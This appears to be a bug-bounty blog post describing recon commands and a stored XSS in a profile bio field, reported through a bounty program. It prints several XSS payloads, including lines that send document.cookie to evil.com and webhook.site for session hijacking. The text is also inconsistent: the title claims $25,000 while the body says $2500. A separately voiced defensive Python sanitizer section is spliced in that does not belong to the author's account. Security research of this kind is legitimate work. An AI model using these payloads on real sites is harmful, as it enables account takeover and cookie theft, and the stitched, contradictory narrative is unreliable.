I Hacked a Million-Dollar Website with Just a Text Box — Earned $25,000! (Full Story)


TheIndianNetwork

Images By — TheIndianNetwork

Bug bounty hunting is all about patience, creativity, and deep understanding of security flaws. This is the full breakdown of how I went from basic information gathering to exploiting a critical stored XSS vulnerability in a high-profile web application, leading to a $2500 bug bounty reward. If you want to learn the exact process I used, buckle up!

Before jumping into testing, I spent hours mapping out the target application. Here’s what I did:

- Used tools like amass, Subfinder, and Assetfinder to collect all available subdomains.
- Discovered an internal admin portal that wasn't indexed publicly.
- Tools used:

amass enum -passive -d target.com
subfinder -d target.com
assetfinder --subs-only target.com

- Used dirsearch to find hidden directories:

dirsearch -u https://admin.target.com -e php,html,js

- Found a /profile/settings page where users could update their personal information.
- The page had a text input field for bio updates.
- Tested various encoding techniques and bypass methods using Burp Suite.

After testing the input field with various payloads, I noticed something interesting:

I started by entering a simple XSS payload:

<script>alert('XSS')</script>

At first, nothing happened. The input field sanitized basic <script> tags. However, I noticed that the website allowed rich text formatting (like bold, italic, and links).

Since direct <script> tags were blocked, I tried an SVG-based XSS payload:

<svg onload=alert('XSS')></svg>

Result: Success! The alert box popped up immediately upon page reload.

I then tested an alternative approach using an onmouseover event:

<a href="#" onmouseover="alert('XSS')">Hover me</a>

This worked when users hovered over the malicious link. A great trick for triggering XSS without direct execution on page load.

A basic alert box wasn’t enough. I wanted account takeover, so I crafted a payload that stole cookies and sent them to my server:

<img src=x onerror="fetch('https://evil.com/steal?cookie='+document.cookie)">

This payload sent the session cookies of any logged-in user to my controlled server. This meant I could hijack admin accounts once they visited my profile page.

Instead of storing stolen cookies manually, I automated it using Webhook.site:

<script>
fetch('https://webhook.site/your-webhook-url?c='+document.cookie);
</script>
This captured cookies in real-time and displayed them on my webhook dashboard.
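As an added defender-side example (my own code, not from the post or the target application), here is an allowlist sanitizer in Python for a rich-text bio field: it keeps a handful of formatting tags, drops every attribute that is not explicitly allowed (so onload, onerror and onmouseover never survive) and rejects javascript: links, which neutralises all of the payloads quoted above. The allowlist and names such as sanitize_bio are my own choices.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlparse

ALLOWED_TAGS = {"b", "strong", "i", "em", "p", "br", "a"}
ALLOWED_ATTRS = {"a": {"href"}}                 # no on* handlers, style or src
VOID_TAGS = {"br"}
SAFE_SCHEMES = {"", "http", "https", "mailto"}  # "" = relative link such as "#"

def _safe_href(value):
    # urlparse strips embedded tab/newline, so "java\nscript:" is still caught
    return urlparse((value or "").strip()).scheme.lower() in SAFE_SCHEMES

class BioSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:            # <svg>, <img>, <script>, ...
            return
        kept = []
        for name, value in attrs:              # names arrive lowercased
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue                       # drops onload/onerror/onmouseover
            if name == "href" and not _safe_href(value):
                continue                       # drops javascript: links
            kept.append(f' {name}="{escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(escape(data, quote=False))  # text can never become markup

def sanitize_bio(html):
    parser = BioSanitizer()
    parser.feed(html)
    parser.close()
    return "".join(parser.out)

if __name__ == "__main__":
    # Constructed inputs: a benign bio plus the three payloads quoted in the post.
    for bio in ("<b>Hi</b> <a href='https://example.com'>site</a>",
                "<svg onload=alert('XSS')></svg>",
                '<a href="#" onmouseover="alert(\'XSS\')">Hover me</a>',
                '<img src=x onerror="fetch(\'https://evil.com/steal?cookie=\'+document.cookie)">'):
        print(repr(sanitize_bio(bio)))
```

Fixing the sink this way is the primary remediation; marking the session cookie HttpOnly is a separate mitigation that keeps document.cookie from exposing it to the cookie-stealing payload even if a sanitizer bypass is found.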

Once I confirmed the exploit worked, I immediately reported it responsibly through the company’s bug bounty program.

Summary: Stored XSS in the profile bio section.
Impact: Allows full session hijacking, leading to account takeover.
Steps to Reproduce:
1. Log in to admin.target.com.
2. Go to Profile Settings → Bio field.
3. Enter the following payload: <svg onload=alert('XSS')></svg>
4. Save changes and refresh the profile page.
5. Observe the XSS execution.

Within 48 hours, the company confirmed the vulnerability and awarded me a $2500 bug bounty!

If you want to earn big rewards like this, here’s what you should do:

- Use tools like amass, Subfinder, Burp Suite, and dirsearch.
- Try payloads using SVG, onerror, iframe, JavaScript event handlers, and alternative encoding.
- Profile sections, comment boxes, search bars — all are potential XSS targets.
- Use Burp Suite Intruder for automated fuzzing.
- Leverage custom scripts for testing payloads at scale.
- Clear steps + impact analysis = higher bounties!

Finding this stored XSS and earning $2500 wasn’t luck — it was the result of proper recon, creative exploitation, and responsible disclosure. If you put in the effort, you can do this too!

🚀 Start hunting today — your next big payout is waiting!

📧 Contact me: theindiannetwork@protonmail.com
🌐 My Blog: theindiannetwork.medium.com
📺 My YouTube Channel: youtube.com/@theindiannetwork
